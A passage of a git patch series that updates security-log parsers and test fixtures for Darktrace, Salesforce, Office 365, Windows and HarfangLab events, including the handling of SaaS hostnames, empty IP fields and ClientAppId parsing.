"{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}" }, "expected": { - "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"9999\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", + "message": "{\"EVENT_TYPE\":\"ApexRestApi\",\"TIMESTAMP\":\"20241029112721.500\",\"REQUEST_ID\":\"5-Acr8biM2uu2UsrkBY5B-\",\"ORGANIZATION_ID\":\"11111111111111111\",\"USER_ID\":\"user123123123123\",\"RUN_TIME\":\"462\",\"CPU_TIME\":\"211\",\"URI\":\"/requests\",\"SESSION_KEY\":\"session-key12323\",\"LOGIN_KEY\":\"xxxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"S\",\"DB_TOTAL_TIME\":\"181052355\",\"METHOD\":\"POST\",\"MEDIA_TYPE\":\"application/json\",\"STATUS_CODE\":\"200\",\"USER_AGENT\":\"12024001\",\"ROWS_PROCESSED\":\"0\",\"NUMBER_FIELDS\":\"\",\"DB_BLOCKS\":\"22201502\",\"DB_CPU_TIME\":\"143\",\"REQUEST_SIZE\":\"\",\"RESPONSE_SIZE\":\"\",\"ENTITY_NAME\":\"\",\"CONNECTED_APP_ID\":\"\",\"CLIENT_NAME\":\"\",\"EXCEPTION_MESSAGE\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-29T11:27:21.500Z\",\"USER_ID_DERIVED\":\"user123123123123QAC\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\"}", "event": { "category": [ "network" @@ -46,7 +46,8 @@ }, "user": { "type": "Standard" - } + }, + "user_agent": 12024001 }, "source": { "address": "1.2.3.4", @@ -57,16 +58,6 @@ }, "user": { "id": "user123123123123" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Other", - "original": "9999", - "os": { - "name": "Other" - } } } } \ No newline at end of file diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json index bc1c801cf..051638d22 100644 --- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json +++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json @@ -100,7 +100,8 @@ "user": { "initiated_logout": true, "type": "admin" - } + }, + "user_agent": 0 }, "source": { "address": "1.2.3.4", @@ -117,16 +118,8 @@ "id": "00530000009M943" }, "user_agent": { - "device": { - "name": "Other" - }, "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "93.0.4577" + "version": "93.0.4577.82" } } } \ No newline at end of file From 7038066ee4cf2d2eccace8489e664b58a5e80e55 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 10:53:40 +0200 Subject: [PATCH 009/150] Fix Darktrace parser --- .../ingest/parser.yml | 23 +++++- .../tests/test_aianalyst_2.json | 79 +++++++++++++++++++ .../test_aianalyst_without_log_type.json | 10 +-- 3 files changed, 101 insertions(+), 11 deletions(-) create mode 100644 Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index f28c8ffae..4e77953a5 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml @@ -19,6 +19,8 @@ pipeline: output_field: datetime format: "%Y-%m-%d %H:%M:%S" - name: set_common_fields + - name: set_breach_devices_fields + filter: "{{json_event.message.breachDevices | length > 0}}" - name: set_aianalyst_fields filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}" - name: set_modelbreaches_fields @@ -136,19 +138,32 @@ stages: {%- endif -%} {{filters}} - set_aianalyst_fields: + set_breach_devices_fields: actions: - set: device.id: "{{json_event.message.breachDevices[0].did}}" event.action: "{{json_event.message.breachDevices[0].title}}" - host.hostname: "{{json_event.message.breachDevices[0].hostname}}" host.id: "{{json_event.message.breachDevices[0].did}}" host.mac: "{{json_event.message.breachDevices[0].mac}}" + + - set: + host.hostname: "{{json_event.message.breachDevices[0].hostname}}" + filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}' + + - set: host.name: "{{json_event.message.breachDevices[0].identifier}}" - filter: "{{json_event.message.breachDevices | length > 0}}" + filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}' + + - set: + user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}" + filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}' + - set: host.ip: "{{json_event.message.breachDevices[0].ip}}" - filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}" + filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}" + + set_aianalyst_fields: + actions: - set: event.kind: "alert" event.category: "threat" diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json new file mode 100644 index 000000000..ebf8a69eb --- /dev/null +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json @@ -0,0 +1,79 @@ +{ + "input": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}" + }, + "expected": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}", + "event": { + "category": "threat", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-27T10:02:28.884000Z", + "darktrace": { + "threat_visualizer": { + "acknowledged": false, + "activityId": "da39a3ee", + "aiaScore": 93.67343783378601, + "attackPhases": [ + 3 + ], + "breachDevices": [ + { + "did": 3820, + "hostname": "SaaS::Zoom: john.doe@example.com", + "identifier": "SaaS::Zoom: john.doe@example.com", + "ip": null, + "mac": null, + "sid": -9, + "subnet": null + } + ], + "category": "critical", + "children": [ + "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b" + ], + "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b", + "externalTriggered": false, + "groupCategory": "critical", + "groupScore": 21.063004966718992, + "groupingIds": [ + "3d2a2fc6" + ], + "mitreTactics": [ + "privilege-escalation" + ], + "periods": [ + { + "end": 1730023230000, + "start": 1730023230000 + } + ], + "relatedBreaches": [ + { + "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use", + "pbid": 46769, + "threatScore": 63.0, + "timestamp": 1730023232000 + } + ], + "userTriggered": false + } + }, + "device": { + "id": "3820" + }, + "host": { + "id": "3820" + }, + "observer": { + "name": "Darktrace", + "product": "Threat visualizer" + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json index 3ba5ae570..b64c616de 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json @@ -66,18 +66,14 @@ "id": "2635" }, "host": { - "hostname": "SaaS::AzureActiveDirectory: test@test.fr", - "id": "2635", - "name": "SaaS::AzureActiveDirectory: test@test.fr" + "id": "2635" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "hosts": [ - "SaaS::AzureActiveDirectory: test@test.fr" - ] + "user": { + "email": "test@test.fr" } } } \ No newline at end of file From 880d24a71d5a4d57880fca0044b6f5452506dfb9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 11:40:45 +0200 Subject: [PATCH 010/150] Fix empty host.ip --- .../ingest/parser.yml | 20 +++++++++---------- .../tests/test_anomalous_file.json | 6 +----- .../test_device_attack_and_recon_tools.json | 6 +----- .../test_device_request_watched_domain.json | 6 +----- 4 files changed, 12 insertions(+), 26 deletions(-) diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index 4e77953a5..92a2d9ef2 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml @@ -54,17 +54,15 @@ stages: observer.name: "Darktrace" observer.product: "Threat visualizer" host.ip: > - {% if json_event.message.device.ips is not in [[], Null]%} - [ - {% for ip in json_event.message.device.ips %} - {% if ip.get("ip") %} - {% if ip["ip"] | is_ipaddress %} - '{{ip["ip"]}}', - {% endif %} - {% endif %} - {% endfor %} - ] - {% endif %} + {%- set host_ips = [] -%} + {%- for ip in json_event.message.device.ips -%} + {%- if ip.get("ip") | is_ipaddress -%} + {%- set host_ips = host_ips.append(ip["ip"]) -%} + {%- endif -%} + {%- endfor -%} + {%- if host_ips | length > 0 -%} + {{ host_ips }} + {%- endif -%} set_modelbreaches_fields: actions: diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json index 781d6cce6..49512bdeb 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json @@ -158,15 +158,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json index 90d9307b3..5092ebe13 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json @@ -118,15 +118,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" - }, - "related": { - "ip": [] } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json index 9ae53b161..7866f9581 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json @@ -114,16 +114,12 @@ } }, "host": { - "id": "6", - "ip": [] + "id": "6" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "ip": [] - }, "service": { "name": "Slack" }, From 4d63741595f95d292e5454a4a5ce65b030613ae8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Thu, 7 Nov 2024 16:01:35 +0100 Subject: [PATCH 011/150] fix(o365): Parse ClientAppId in Exchange events --- Office 365/o365/ingest/parser.yml | 7 +++++++ Office 365/o365/tests/clientipadress.json | 5 +++++ Office 365/o365/tests/exchange_item_update.json | 5 +++++ Office 365/o365/tests/inbox_rule.json | 5 ++++- 4 files changed, 21 insertions(+), 1 deletion(-) diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 62a4098df..13036065f 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -164,6 +164,10 @@ stages: filter: '{{json_event.message.get("Parameters") != None}}' - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" + - set: + office365.context.client.id: "{{json_event.message.AppId}}" + filter: '{{json_event.message.get("ClientAppId") == ""}}' parse_exchange_item: actions: @@ -189,6 +193,7 @@ stages: user.id: "{{json_event.message.LogonUserSid}}" office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}" office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" - set: email.subject: "{{json_event.message.Item.Subject}}" email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}" @@ -237,6 +242,7 @@ stages: ] - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_share_point: actions: - set: @@ -254,6 +260,7 @@ stages: actions: - set: office365.context.aad_session_id: "{{json_event.message.SessionId}}" + office365.context.client.id: "{{json_event.message.ClientAppId}}" parse_network_traffic: actions: diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index c20107759..6f5c9ac9d 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -23,6 +23,11 @@ "target": "user" }, "office365": { + "context": { + "client": { + "id": "clientappidxxxx-xxx-xxx-xxxx" + } + }, "record_type": 50, "result_status": "Succeeded", "user_type": { diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index ad69be989..30682248f 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -29,6 +29,11 @@ "subject": "HI" }, "office365": { + "context": { + "client": { + "id": "037fd006-a72b-49ae-4bb0-08dba30c8729" + } + }, "exchange": { "mailbox_guid": "8208550a-4001-439d-a9f6-e95d76767507" }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index 8af518085..f3609c050 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json @@ -21,7 +21,10 @@ "object_id": "EURPR07A010.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/example.onmicrosoft.com/bc1b1df3-f861-4aec-bf7c-40ce5b5566c1\\RULE_NAME" }, "context": { - "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847" + "aad_session_id": "984c0958-0631-4b90-b116-15094fc36847", + "client": { + "id": "00000002-0000-0ff1-ce00-000000000000" + } }, "exchange_admin": { "parameters": [ From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 09:18:29 +0200 Subject: [PATCH 012/150] Fix windows --- Windows/windows/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 5fc6b2eec..e21ec0b94 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 12:19:44 +0200 Subject: [PATCH 013/150] Fix connector UUID --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index da4658b6a..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 -automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service From 60131a16889905c6cb7b1fd2044d4ad5ab89bfea Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 13:48:57 +0200 Subject: [PATCH 014/150] HarfangLab - fix ip parsing --- HarfangLab/harfanglab/ingest/parser.yml | 5 +- .../harfanglab/tests/authentication_2.json | 103 ++++++++++++++++++ 2 files changed, 107 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/authentication_2.json diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 7ff16f6df..1376e0758 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -277,7 +277,6 @@ stages: event.type: ["info"] event.provider: "{{json_event.message.source_name}}" event.code: "{{json_event.message.event_id|string}}" - source.ip: "{{json_event.message.event_data.IpAddress}}" action.id: "{{json_event.message.event_id}}" user.name: "{{json_event.message.event_data.SubjectUserName}}" user.domain: "{{json_event.message.event_data.SubjectDomainName}}" @@ -475,6 +474,10 @@ stages: action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}" action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}" + - set: + source.ip: "{{json_event.message.event_data.IpAddress}}" + filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}" + authentication_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json new file mode 100644 index 000000000..0f5d169e9 --- /dev/null +++ b/HarfangLab/harfanglab/tests/authentication_2.json @@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}" + }, + "expected": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", 